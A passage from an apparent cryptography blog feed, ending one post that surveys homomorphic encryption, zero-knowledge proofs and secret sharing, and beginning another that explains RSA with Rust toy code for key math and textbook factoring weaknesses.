&lt;h2 id=&quot;fhe-fundamentals&quot;&gt;FHE fundamentals&lt;&#x2F;h2&gt;
&lt;p&gt;There are many libraries for FHE nowadays, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.openfhe.org&#x2F;&quot;&gt;OpenFHE&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.microsoft.com&#x2F;en-us&#x2F;research&#x2F;project&#x2F;microsoft-seal&#x2F;&quot;&gt;Microsoft SEAL&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;cpeikert&#x2F;Lol&quot;&gt;Λ∘λ&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;homomorphicencryption.org&#x2F;introduction&#x2F;&quot;&gt;many more&lt;&#x2F;a&gt;. With FHE you can make private queries to search engines or pages, such as Wikipedia; see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;spiralwiki.com&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;FHE schemes are based on lattice cryptography. A lattice is given by all linear combinations with integer coefficients of some base vectors. To fix ideas, imagine we have two vectors \( e_x=(1,0) \) and \( e_y=(0,1) \) and we consider all possible combinations \( p=xe_x+ye_y \) with \( x,y \) in \( \mathbb{Z} \), yielding the points \( (0,0),(1,0),(1,1),(-1,-2),\dots \) A lattice looks like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lattice_problem#&#x2F;media&#x2F;File:SVP.svg&quot;&gt;this&lt;&#x2F;a&gt;. Ideal lattices correspond to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Ideal_(ring_theory)&quot;&gt;ideals in polynomial rings&lt;&#x2F;a&gt;, inheriting the natural addition and multiplication operations of the ring. (Ideals generalize the idea behind certain subsets of the integers, such as the even numbers: the sum of any two even numbers is even, and whenever we multiply any integer by an even number, the result is also even, an absorption property.)&lt;&#x2F;p&gt;
&lt;p&gt;To build an FHE scheme, we can picture a ciphertext with some small noise attached to it, such that decryption works as long as the noise is below a certain threshold. Suppose we have ways to homomorphically add and multiply ciphertexts, at the expense of increasing the noise accordingly, that is, \( E(a+b)=E(a)\oplus E(b) \) and \( E(a\times b)=E(a)\cdot E(b) \). We call this a somewhat homomorphic encryption scheme (SHE). If we could add a “recrypt” algorithm, which takes a given ciphertext \( E(m) \) and reduces its noise, obtaining a new ciphertext \( E'(m) \) that also encrypts \( m \), then we can obtain an FHE scheme.&lt;&#x2F;p&gt;
&lt;p&gt;The SHE scheme can handle circuits of a certain depth (imagine this as the number of times you can multiply or add before the noise becomes too large). The SHE scheme can be modified so that its decryption circuit has a lower multiplicative depth, making it “bootstrappable” and thus transforming it into an FHE scheme.&lt;&#x2F;p&gt;
&lt;p&gt;Some common schemes for FHE are:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Brakerski-Fan-Vercauteren (BFV) and Brakerski-Gentry-Vaikuntanathan (BGV) for integer arithmetic.&lt;&#x2F;li&gt;
&lt;li&gt;Cheon-Kim-Kim-Song (CKKS) for real number arithmetic.&lt;&#x2F;li&gt;
&lt;li&gt;Ducas-Micciancio (DM) and Chillotti-Gama-Georgieva-Izabachene (CGGI) for boolean circuits and arbitrary functions using lookup tables.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Many cryptographic primitives, such as public key cryptography, are based on the hardness or intractability of mathematical problems, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Integer_factorization&quot;&gt;integer factorization&lt;&#x2F;a&gt; (RSA) or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Discrete_logarithm&quot;&gt;discrete logarithm problem&lt;&#x2F;a&gt; (elliptic curve cryptography). These problems cannot be solved efficiently with current computers (at least, provided that the integers involved are big enough or the groups have a large number of elements). However, quantum computers could easily handle these problems if certain conditions are met, via &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Shor%27s_algorithm&quot;&gt;Shor’s algorithm&lt;&#x2F;a&gt;. FHE is based on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lattice_problem&quot;&gt;shortest vector problem&lt;&#x2F;a&gt; or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;homomorphicencryption.org&#x2F;wp-content&#x2F;uploads&#x2F;2018&#x2F;11&#x2F;HomomorphicEncryptionStandardv1.1.pdf&quot;&gt;ring learning-with-errors&lt;&#x2F;a&gt; (RLWE) problem, which is related to lattice problems believed to be hard even for quantum computers and, in particular, not known to be solvable with Shor’s algorithm (FHE is therefore considered quantum resistant).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;zero-knowledge-proofs&quot;&gt;Zero-knowledge proofs&lt;&#x2F;h2&gt;
&lt;p&gt;Zero-knowledge proofs (ZKPs) have been gaining a lot of attention during the last decade, especially after the first efficient SNARK constructions. ZKPs play an important role in addressing two of the main challenges of decentralized ledgers: scalability and privacy. To validate transactions, nodes have to re-execute them, leading to bottlenecks. Moreover, all the information in the ledger is public, which can leak sensitive information about individuals and organizations.&lt;&#x2F;p&gt;
&lt;p&gt;zk-SNARKs allow one party to prove a statement, without revealing anything other than the validity of the statement. For example, we can prove that we have a given secret key, without revealing it. We can also prove that we have executed some transaction or computation, without exposing secret or sensitive information. An important property of SNARKs is their succinctness, which means that proofs:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Are short (occupy little memory, about 1 kB for some SNARKs).&lt;&#x2F;li&gt;
&lt;li&gt;Are fast to verify (typically, in the order of milliseconds).&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Ethereum has been adding zero-knowledge proof technologies recently to solve scalability issues. Zcash implemented ZKP to provide private transactions, while Aleo uses them to enable running private computations in a decentralized way.&lt;&#x2F;p&gt;
&lt;p&gt;How do SNARKs work under the hood? Even if there are many different constructions (such as Marlin, Plonk, Halo, and STARKs), they have a common recipe. The building blocks of SNARKs are polynomial interactive oracle proofs (PIOP) and polynomial commitment schemes (PCS). Depending on the choices made, the resulting SNARK has different properties and requirements. For example, it may be transparent (does not need a trusted setup), post-quantum secure, need special (pairing-friendly) elliptic curves, take longer times to generate proofs, have shorter proofs (less than 1 kB), allow for easy recursion, etc. A comparison between different polynomial commitment schemes is shown &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackernoon.com&#x2F;kzg10-ipa-fri-and-darks-analysis-of-polynomial-commitment-schemes&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;To be able to construct the proof, we first need to transform our computation into some SNARK-friendly format. We can prove the correctness of our execution by reducing it to some kind of NP-complete problem, such as graph coloring or circuit satisfiability. We will work with arithmetic circuits and the transformation of a program into a circuit is known as arithmetization. There are different forms or strategies for doing this transformation; an overview of the most commonly used is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;arithmetization-schemes-for-zk-snarks&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;multiparty-computation&quot;&gt;Multiparty computation&lt;&#x2F;h2&gt;
&lt;p&gt;In a secure multiparty computation, a group of participants, &lt;em&gt;p1, p2, …, pm&lt;&#x2F;em&gt;, each having some secret information &lt;em&gt;s1, s2, …, sm&lt;&#x2F;em&gt;, want to compute a certain function that requires the knowledge of that secret information. For example, we could have &lt;em&gt;m&lt;&#x2F;em&gt; employees wanting to know their average salary without revealing their incomes. One easy way to do so would be for all of them to trust another party: each sends their secret information and the “trusted” party computes the average. The drawback: the “trusted” party learns all the information and could leverage it. Or perhaps he is honest, but he gets hacked and an attacker obtains everything.&lt;&#x2F;p&gt;
&lt;p&gt;Luckily, there is a useful cryptographic primitive to deal with cases like these: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.geeksforgeeks.org&#x2F;additive-secret-sharing-and-share-proactivization-using-python&#x2F;&quot;&gt;additive secret sharing&lt;&#x2F;a&gt;. Each of the participants can break their secret &lt;em&gt;sk&lt;&#x2F;em&gt; into &lt;em&gt;m&lt;&#x2F;em&gt; shares in such a way that no shareholder can, on his own, learn the secret. To reconstruct the secret, all of the other parties have to collude and pool their parts. In the example above, each employee can break his salary &lt;em&gt;sk&lt;&#x2F;em&gt; into &lt;em&gt;m&lt;&#x2F;em&gt; different, random shares. For example, if we have 4 employees and employee A earns 4500, he can split it into 4 shares &lt;em&gt;sAi&lt;&#x2F;em&gt;: -1200, 1500, 3600, 600, such that ∑i sAi = 4500. He keeps one share and distributes the rest to B, C, and D. In turn, the others break their secrets and distribute the shares. Afterward, each participant sums all the shares he holds, obtaining a partial sum &lt;em&gt;sp,A&lt;&#x2F;em&gt; = ∑k sk,A, and then these partial sums are shared to compute the final average.&lt;&#x2F;p&gt;
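&lt;p&gt;The salary example can be sketched in a few lines of Rust. This is an illustrative toy: the function name &lt;code&gt;share_secret&lt;&#x2F;code&gt; is ours, and the “random” offsets are fixed for readability, whereas a real implementation must draw shares from a cryptographic RNG.&lt;&#x2F;p&gt;

```rust
/// Split `secret` into additive shares: the given offsets plus one final
/// share chosen so that all shares sum back to the secret.
/// Toy sketch: real schemes sample the offsets from a cryptographic RNG.
fn share_secret(secret: i64, offsets: &[i64]) -> Vec<i64> {
    let mut shares = offsets.to_vec();
    let partial: i64 = offsets.iter().sum();
    shares.push(secret - partial); // last share fixes the total
    shares
}

fn main() {
    // Employee A earns 4500 and uses the shares from the example above.
    let shares_a = share_secret(4500, &[-1200, 1500, 3600]);
    assert_eq!(shares_a, vec![-1200, 1500, 3600, 600]);

    // Four employees (toy salaries), each splitting into four shares.
    let salaries = [4500i64, 5200, 3900, 6100];
    let all_shares: Vec<Vec<i64>> = salaries
        .iter()
        .map(|&s| share_secret(s, &[-1200, 1500, 3600]))
        .collect();

    // Participant j holds the j-th share of every salary and publishes
    // only the partial sum; the partial sums reveal just the total.
    let partials: Vec<i64> =
        (0..4).map(|j| all_shares.iter().map(|sh| sh[j]).sum()).collect();
    let total: i64 = partials.iter().sum();
    assert_eq!(total, salaries.iter().sum::<i64>());
    println!("average salary: {}", total / salaries.len() as i64); // 4925
}
```

&lt;p&gt;No single participant ever sees another participant’s salary, yet the sum of the published partial sums equals the sum of all salaries.&lt;&#x2F;p&gt;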
&lt;p&gt;Secret sharing is secure whenever parties holding at most &lt;em&gt;m&lt;&#x2F;em&gt; − 1 shares have no more information than anyone with no shares at all.&lt;&#x2F;p&gt;
&lt;p&gt;Now, how can we ensure that each party does what it is supposed to do? ZKPs give us a way to guarantee that each participant performs the computation as expected, by submitting a proof that attests to its correct execution. If a participant cheats, the proof will fail and he can be penalized. Early MPC protocols had significant overhead; the last decade has seen many advances, making MPC efficient and leading to many applications.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Fully homomorphic encryption, zero-knowledge proofs, and multiparty computations are important cryptographic primitives that have been gaining more and more attention in recent years, with the introduction of decentralized ledgers and increasing concern over data privacy. Each has its unique features and applications and has something to offer to the other primitives. FHE allows us to make cloud computations on encrypted data without needing to hand our key to the server, which prevents third parties from gaining access to the specific contents of the data. ZKP allow us to prove the correctness of a given computation by submitting a short proof, which can be quickly verified; this is seen as one of the greatest tools to solve the privacy and scalability issues of decentralized ledgers. Multiparty computation helps us distribute a complex computation or calculate something when all the inputs are distributed among several parties in a secure way; it has applications for voting, private auctions, bidding, etc.&lt;&#x2F;p&gt;
&lt;p&gt;FHE can help us improve existing ZKP, which in turn can make multiparty computation much simpler and more secure. In turn, MPC is needed for the setup ceremonies of zk-SNARKs and can also help provers reduce their proof generation time by delegating it to untrusted powerful servers. ZKP can also help us ensure that the computations involving encrypted data are carried out correctly. All these fields have seen great advances over the last decade and each will help the others advance, leading to new interesting applications, with a greater focus on decentralization and privacy. In upcoming posts, we will cover in more depth the mathematical foundations of FHE and further applications of MPC and ZKP.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to create your own crappy RSA as a software developer</title>
          <pubDate>Fri, 26 Aug 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-create-your-own-crappy-rsa-as-a-software-developer/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-create-your-own-crappy-rsa-as-a-software-developer/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-create-your-own-crappy-rsa-as-a-software-developer/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;One of the key developments in cryptography was the introduction of public key (or asymmetric) cryptosystems. These rely on pairs of keys: one of them is the public key (known to everybody) and the other is the private key (known only to the specific user). The public key is used to encrypt messages (anybody can do this since it is public), while the private key is used to decrypt the messages. This contrasts with symmetric encryption, where a single key performs both operations (and which was the only method available before the 1970s). Symmetric encryption requires a secure channel to exchange or agree on the key, so only certain privileged parties could communicate secretly; public key cryptography is what enabled secure, real-time communication over the internet as we know it. Depending on the method used, the keys could be numbers (as in RSA) or, in the case of elliptic curve cryptography (ECC), a number and a point on an elliptic curve. The encryption and decryption algorithms are also publicly known, so the security of the whole system depends on never revealing the private key (this is known as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Kerckhoffs%27s_principle&quot;&gt;Kerckhoffs’s principle&lt;&#x2F;a&gt;). Asymmetric cryptography plays a fundamental role in many applications and protocols, offering confidentiality, authenticity, and non-repudiation of data and electronic communications. Internet standards, such as TLS, SSH, and PGP, rely on this cryptographic primitive.&lt;&#x2F;p&gt;
&lt;p&gt;RSA (named after Rivest, Shamir, and Adleman) is one of the first public key cryptosystems, among the most widely used, and one of the simplest to understand and implement (1). We will discuss today how RSA works, how to implement its basic structure, and some of the pitfalls and weaknesses of this system (which have led it to lose ground against ECC).&lt;&#x2F;p&gt;
&lt;p&gt;We will be using some math and cryptography concepts below; you may want to review our math &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;survival kit&lt;&#x2F;a&gt; first.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-rsa-works&quot;&gt;How RSA works&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;non-rigorous-mathematical-idea&quot;&gt;Non-rigorous mathematical idea&lt;&#x2F;h3&gt;
&lt;p&gt;RSA relies on four key steps: key generation, key distribution, encryption, and decryption. Instead of describing each of them in sequence, we will give an overview of the whole process and then go into the details. The basic idea is the following: given a number $n$ (public), there are two numbers $e$ (public key, used for encryption) and $d$ (private key, used for decryption), which are multiplicative inverses (that is, $d\times e=1$, so $e=d^{-1}$). Given a message $M$, expressed as a number between $0$ and $n-1$, the encryption $E(M)$ is done by taking the $e$-th power of $M$,&lt;br &#x2F;&gt;
$E(M)=M^e$&lt;br &#x2F;&gt;
Decryption is done similarly by taking the $d$-th power of the encrypted message,&lt;br &#x2F;&gt;
${E(M)}^d=(M^{e})^d=M^{d\times e}=M$&lt;br &#x2F;&gt;
Of course, if you think in terms of high-school math, there are several problems, starting with the obvious fact that knowing $e$ allows you to calculate $d$ and that the encrypted message can grow into a very large number (and take a lot of space). This is where number theory and modular arithmetic come to our rescue.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;steps&quot;&gt;Steps&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s now look in more detail at each of the steps and how we can get something that is very difficult to crack unless you know the secret key.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Key generation:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Pick large random prime numbers $p$ and $q$ and keep them secret (2).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Calculate $n=p\times q$. $n$ is released as part of the public key parameters.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Compute the value of [Euler&amp;#39;s totient function](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Euler%27s_totient_function) $\phi(n)=(p-1)\times (q-1)$ and keep it secret (3).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Choose an integer $1&amp;lt;e&amp;lt;\phi(n)$ which is coprime to $\phi (n)$ (that is, their only common divisor is 1). $65537=2^{16}+1$ is a typical choice since it offers rather fast encryption and security. Another popular choice is $3$, but it is known that this leads to insecure encryption in many settings.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Calculate $d=e^{-1} \mod{\phi(n)}$, that is, $d$ is the multiplicative inverse of $e$ modulo $\phi(n)$ (4). This can be done via taking powers of $e$ or in a faster way using the [extended Euclidean algorithm](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Extended_Euclidean_algorithm).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Key distribution: If two people Alice and Bob want to communicate, each sends the other their public parameters $(e_A,n_A)$ and $(e_B,n_B)$. Of course, an obvious question arises, how do Bob and Alice know that they got each other&amp;#39;s public parameters and not someone else&amp;#39;s (the infamous man-in-the-middle)?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Encryption:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Convert the message $P$ into an integer $1&amp;lt;m&amp;lt;n$ by using an agreed padding scheme.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $E(m)$ is calculated $E(m)\equiv m^e \pmod{n}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Decryption:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Compute the message $m$ by doing ${E(m)}^d\equiv m \pmod{n}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Reverse the first step of encryption to convert $m$ to $P$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;example-of-the-calculations&quot;&gt;Example of the calculations&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s pick a toy model to illustrate how the calculations are done (of course, no real model uses these simple numbers, because it is rather easy to break, even by brute force attempts).&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. We choose two random primes 17 and 19.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $n=17\times 19=323$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. We evaluate $\phi(323)=288$ or $\lambda(323)=144=lcm(16,18)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. We pick $e=5$ (remember, a small $e$ is not a good choice). We cannot pick $3$ because $3$ is not coprime to $\phi(n)=288=2^5 \times 3^2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. $d=5^{11}\equiv 29 \pmod{144}$. (We use Carmichael&amp;#39;s totient function since it is faster). Let&amp;#39;s check we did right: $5\times 29=145\equiv 1 \pmod{144}$, since $145=1\times 144+1$. An even faster alternative would be using the extended Euclidean algorithm.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. Our message is $11$. Therefore $E(11)=11^5\equiv 197\pmod{323}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. We now attempt to decrypt $197^{29}\equiv 11 \pmod{323}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;the-math-behind-the-scenes&quot;&gt;The math behind the scenes&lt;&#x2F;h3&gt;
&lt;p&gt;The trick works because we have two numbers $d$ and $e$, such that $d\times e \equiv 1 \pmod{\phi(n)}$. In other words, $d\times e=k\phi(n)+1$. If we perform encryption, followed by decryption, we get&lt;br &#x2F;&gt;
${(m^e)}^d=m^{e\times d}=m^{1+k\phi(n)}=m\times (m^{\phi(n)})^k \equiv m \pmod{n}$&lt;br &#x2F;&gt;
The last step is a consequence of Euler’s theorem, since&lt;br &#x2F;&gt;
$a^{\phi(n)}\equiv 1 \pmod{n}$, given $a$ and $n$ are coprime.&lt;&#x2F;p&gt;
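&lt;p&gt;We can check the toy numbers above end to end with a short Rust sketch. The helper names (&lt;code&gt;mod_pow&lt;&#x2F;code&gt;, &lt;code&gt;mod_inverse&lt;&#x2F;code&gt;) are ours, not a library API; the inverse is computed with the extended Euclidean algorithm mentioned in the key generation step.&lt;&#x2F;p&gt;

```rust
/// Square-and-multiply modular exponentiation (toy sketch; a real RSA
/// implementation needs arbitrary-precision, constant-time arithmetic).
fn mod_pow(mut base: u128, mut exp: u128, modulus: u128) -> u128 {
    let mut acc = 1u128;
    base %= modulus;
    while exp > 0 {
        if exp % 2 == 1 {
            acc = acc * base % modulus;
        }
        base = base * base % modulus;
        exp /= 2;
    }
    acc
}

/// Multiplicative inverse of `e` modulo `m` via the extended Euclidean
/// algorithm; panics if `e` is not coprime to `m`.
fn mod_inverse(e: i128, m: i128) -> i128 {
    let (mut r0, mut r1) = (m, e);
    let (mut t0, mut t1) = (0i128, 1i128);
    while r1 != 0 {
        let q = r0 / r1;
        (r0, r1) = (r1, r0 - q * r1);
        (t0, t1) = (t1, t0 - q * t1);
    }
    assert_eq!(r0, 1, "e must be coprime to the modulus");
    t0.rem_euclid(m)
}

fn main() {
    let (p, q, e) = (17u128, 19u128, 5u128);
    let n = p * q; // 323
    let lambda = 144u128; // lcm(p - 1, q - 1), as in step 3 of the example
    let d = mod_inverse(e as i128, lambda as i128) as u128;
    assert_eq!(d, 29); // matches step 5 of the example
    let m = 11u128;
    let c = mod_pow(m, e, n);
    assert_eq!(c, 197); // E(11) = 11^5 mod 323
    assert_eq!(mod_pow(c, d, n), m); // decryption recovers the message
}
```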
&lt;h3 id=&quot;security-issues&quot;&gt;Security issues&lt;&#x2F;h3&gt;
&lt;p&gt;There are several issues with RSA, especially when it is not implemented properly. The random prime numbers must be truly unpredictable (therefore, always use a pseudorandom generator suitable for cryptographic applications). Many attacks work by factoring the public parameter $n$. If we can find $p$ or $q$, then we get the other one, and we can calculate $\lambda(n)$ or $\phi(n)$ and, from it, the multiplicative inverse of $e$, which is none other than the private key. For example, if $p$ and $q$ are very close in size, we know $p \approx q \approx \sqrt{n}$ and Fermat’s factorization as a difference of two squares, $n=a^2-b^2$, is feasible. It is easy to see that $a^2-b^2=(a+b)\times (a-b)$, and so we have both factors. If we know many different $n$, we can try breaking the factorization by finding the greatest common divisor. For example, say we know the moduli $n_1$ and $n_2$ of two people and that they share a common factor $p$. Then we have $p=\gcd(n_1,n_2)$, and the gcd can be found extremely fast (in polynomial time) thanks to Euclid’s algorithm. This way, we break the security of both accounts.&lt;&#x2F;p&gt;
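&lt;p&gt;Both attacks are easy to demonstrate with toy numbers. The following sketch (illustrative names, not hardened code) implements Fermat’s factorization for close primes and the shared-factor gcd attack:&lt;&#x2F;p&gt;

```rust
/// Integer square root by Newton's method.
fn isqrt(n: u128) -> u128 {
    if n < 2 {
        return n;
    }
    let mut x = n;
    let mut y = (x + 1) / 2;
    while y < x {
        x = y;
        y = (x + n / x) / 2;
    }
    x
}

/// Fermat's factorization: find a >= ceil(sqrt(n)) with a^2 - n a perfect
/// square b^2, so that n = (a - b)(a + b). Fast when p and q are close.
fn fermat_factor(n: u128) -> (u128, u128) {
    let mut a = isqrt(n);
    if a * a < n {
        a += 1;
    }
    loop {
        let b2 = a * a - n;
        let b = isqrt(b2);
        if b * b == b2 {
            return (a - b, a + b);
        }
        a += 1;
    }
}

/// Euclid's algorithm: runs in polynomial time.
fn gcd(mut a: u128, mut b: u128) -> u128 {
    while b != 0 {
        (a, b) = (b, a % b);
    }
    a
}

fn main() {
    // 323 = 17 * 19: primes of similar size fall to Fermat's method quickly.
    assert_eq!(fermat_factor(323), (17, 19));
    // Two moduli sharing the prime 17 leak it through a single gcd.
    let (n1, n2) = (17u128 * 19, 17u128 * 23);
    assert_eq!(gcd(n1, n2), 17);
}
```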
&lt;p&gt;Other methods work even if the factorization is not known. In the case of low exponents $e$ (such as $3$), it may happen that $M^3$ does not exceed the modulus $n$, and so the message may be easily recovered by taking the cube root. On the other hand, if the private key is small, you can use &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Wiener%27s_attack&quot;&gt;Wiener’s&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2020&#x2F;1214.pdf&quot;&gt;Boneh-Durfee’s attacks&lt;&#x2F;a&gt; and get the key. A collection of several strategies can be found at the following &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;RsaCtfTool&#x2F;RsaCtfTool&quot;&gt;link&lt;&#x2F;a&gt;. You can build your own factorization methods or use open source tools such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.sagemath.org&#x2F;&quot;&gt;SageMath&lt;&#x2F;a&gt; to see how easy it is to factor a composite number.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;implementing-some-of-the-key-functions&quot;&gt;Implementing some of the key functions&lt;&#x2F;h2&gt;
&lt;p&gt;To be able to perform operations with RSA, we need to implement first some of the arithmetic operations and define field elements. We will show how to implement some of these in Rust.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use std::ops::{Add, Sub, Mul, Div};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct FieldPoint {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    num: u128,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prime: u128,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first line imports the standard library (in particular, the operations of addition, subtraction, multiplication, and division) which will allow us to override these operators with the expressions we need to use in modular arithmetic.&lt;&#x2F;p&gt;
&lt;p&gt;In the second line, we define a public structure named &lt;code&gt;FieldPoint&lt;&#x2F;code&gt;, which has two fields: &lt;code&gt;num&lt;&#x2F;code&gt; (a number in the range 0 to prime − 1) and &lt;code&gt;prime&lt;&#x2F;code&gt; (this gives us the size of the field; we will perform all operations modulo prime). For practical applications, we would need to replace the unsigned &lt;code&gt;u128&lt;&#x2F;code&gt; integers with an arbitrary-precision integer type able to store much larger numbers.&lt;&#x2F;p&gt;
&lt;p&gt;We can now instantiate some methods over &lt;code&gt;FieldPoint&lt;&#x2F;code&gt;, such as how to create one or how to multiply or divide field elements.&lt;&#x2F;p&gt;
